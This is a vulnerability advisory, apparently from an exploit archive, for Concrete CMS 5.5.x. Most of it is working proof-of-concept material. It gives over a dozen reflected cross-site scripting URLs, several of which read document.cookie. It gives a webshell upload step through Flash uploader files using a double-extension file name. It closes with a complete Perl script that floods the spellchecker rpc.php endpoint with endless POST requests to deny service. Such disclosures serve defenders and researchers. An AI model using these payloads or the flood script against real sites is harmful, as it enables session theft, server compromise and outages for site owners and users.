source: https://www.securityfocus.com/bid/53640/info
Concrete CMS is prone to following vulnerabilities because it fails to properly handle user-supplied input.
1. Multiple cross-site scripting vulnerabilities
2. An arbitrary-file-upload vulnerability
3. A denial-of-service vulnerability
An attacker may leverage these issues to cause denial-of-service conditions or to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
Concrete CMS versions 5.5 and 5.5.21 are vulnerable.
Cross Site Scripting:
1) http://www.example.com/learn/concrete/concrete5.5.2.1/index.php/tools/required/sitemap_search_selector?select_mode="><script>alert(1);</script>
2) http://www.example.com/learn/concrete/concrete5.5.2.1/index.php/tools/required/files/import?ocID="><script>alert(document.cookie);</script>&searchInstance=file1337335625
3) http://www.example.com/learn/concrete/concrete5.5.2.1/index.php/tools/required/files/import?ocID=13&searchInstance="><script>alert(document.cookie);</script>
3A)http://www.example.com/learn/concrete/concrete5.5.2.1/index.php/tools/required/files/search_results?submit_search=123&ocID=123&searchType=&searchInstance=&searchInstance=&ccm_order_by=fvDateAdded&ccm_order_dir=asc&searchType=123 &searchInstance="><script>alert(1);</script>
www.example.com/learn/concrete/concrete5.5.2.1/index.php/tools/required/files/search_results?submit_search=123&ocID=123&searchType=&searchInstance="><script>alert(1);</script>
4)(onmouseovervent) http://www.example.com/learn/concrete/concrete5.5.2.1/index.php/tools/required/files/search_results?submit_search=1&fType=&fExtension=&searchType=DASHBOARD&ccm_order_dir=&ccm_order_by=&fileSelector=&searchInstance=" onmouseover="alert(1)"&fKeywords=zssds&fsID[]=-1&numResults=10&searchField=&selectedSearchField[]=
4A)(without onmouseover event)
http://www.example.com/learn/concrete/concrete5.5.2.1/index.php/tools/required/files/search_results?submit_search=1&fType=&fExtension=&searchType=DASHBOARD&ccm_order_dir=&ccm_order_by=&fileSelector=&searchInstance="><script>alert(1);</script>&fKeywords=zssds&fsID[]=-1&numResults=10&searchField=&selectedSearchField[]=
5)http://www.example.com/learn/concrete/concrete5.5.2.1/index.php/tools/required/sitemap_search_selector?select_mode=move_copy_delete&cID="><script>alert(1);</script>
6) http://www.example.com/learn/concrete/concrete5.5.2.1/index.php/tools/required/files/edit?searchInstance=');</script><script>alert(document.cookie);</script>&fID=7
&fid=VALID_ID_OF_IAMGE
7)http://www.example.com/learn/concrete/concrete5.5.2.1/index.php/tools/required/files/add_to?searchInstance="><script>alert(document.cookie);</script>&fID=owned
8)http://www.example.com/learn/concrete/concrete5.5.2.1/index.php/tools/required/files/replace?searchInstance="><script>alert(document.cookie);</script>&fID=4
9)http://www.example.com/learn/concrete/concrete5.5.2.1/index.php/tools/required/files/bulk_properties/?&fID[]=17&uploaded=true&searchInstance="><script>alert(document.cookie);</script>
&fid=VALID_ID_OF_IAMGE
10)http://www.example.com/learn/concrete/concrete5.5.2.1/index.php/tools/required/files/permissions?searchInstance="><script>alert("AkaStep");</script>&fID=owned
11)http://www.example.com/learn/concrete/concrete5.5.2.1/index.php/tools/required/dashboard/sitemap_data.php?instance_id="><script>alert(1);</script>&node=owned&display_mode=full&select_mode=&selectedPageID=
11A)
http://www.example.com/learn/concrete/concrete5.5.2.1/index.php/tools/required/dashboard/sitemap_data.php?instance_id=owned&node="><script>alert(1);</script>&display_mode=full&select_mode=&selectedPageID=
11B)
http://www.example.com/learn/concrete/concrete5.5.2.1/index.php/tools/required/dashboard/sitemap_data.php?instance_id=owned&node=owned&display_mode="><script>alert(1);</script>&select_mode=&selectedPageID=
11C)
http://www.example.com/learn/concrete/concrete5.5.2.1/index.php/tools/required/dashboard/sitemap_data.php?instance_id=owned&node=owned&display_mode=owned&select_mode=owned&selectedPageID="><script>alert(1);</script>
11D)
http://www.example.com/learn/concrete/concrete5.5.2.1/index.php/tools/required/dashboard/sitemap_data.php?instance_id=owned&node=owned&display_mode=owned&select_mode="><script>alert(1);</script>&selectedPageID=owned
(All parameters goes to page source without any sanitization +validation)
12)http://www.example.com/learn/concrete/concrete5.5.2.1/index.php/tools/required/files/search_dialog?ocID="><script>alert(1);</script>&search=1
13)http://www.example.com/learn/concrete/concrete5.5.2.1/index.php/tools/required/files/customize_search_columns?searchInstance="><script>alert(document.cookie);</script>
Shell upload:
#### p0c 1 [ Upload File via FlashUploader ] ###==>
http://www.example.com/concrete/flash/thumbnail_editor_2.swf
http://www.example.com/concrete/flash/thumbnail_editor_3.swf
http://www.example.com/concrete/flash/swfupload/swfupload.swf
http://www.example.com/concrete/flash/uploader/uploader.swf
# Upload File/Shell Inj3ct0r.php;.gif
DOS:
#### p0c 2 [ DDos with RPC 'using simple PERL script]===>
#!/usr/bin/perl
use Socket;
if (@ARGV < 2) { &usage }
$rand=rand(10);
$host = $ARGV[0];
$dir = $ARGV[1];
$host =~ s/(http:\/\/)//eg;
for ($i=0; $i<66; $i--)
{
$user="w00t".$rand.$i;
$data = "Aa"
;
$lenx = length $data;
$rpc = "POST ".$dir."concrete/js/tiny_mce/plugins/spellchecker/rpc.php HTTP/1.1\r\n". # Or use just /index.php
"Accept: */*\r\n".
"Content-Type: application/x-www-form-urlencoded\r\n".
"Accept-Encoding: gzip, deflate\r\n".
"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\r\n".
"Host: $host\r\n".
"Content-Length: $lenx\r\n".
"Connection: Keep-Alive\r\n".
"Cache-Control: no-cache\r\n\r\n".
"$data";
my $port = "80";
my $proto = getprotobyname('tcp');
socket(SOCKET, PF_INET, SOCK_STREAM, $proto);
connect(SOCKET, sockaddr_in($port, inet_aton($host))) || redo;
send(SOCKET,"$rpc", 0);
syswrite STDOUT, "+" ;
}
print "\n\n";
system('ping $host');
sub usage {
print "\tusage: \n";
print "\t$0 <host> </dir/>\n";
print "\Ex: $0 127.0.0.1 /concrete/\n";
print "\Ex2: $0 target.com /\n\n";
exit();
};
# << ThE|End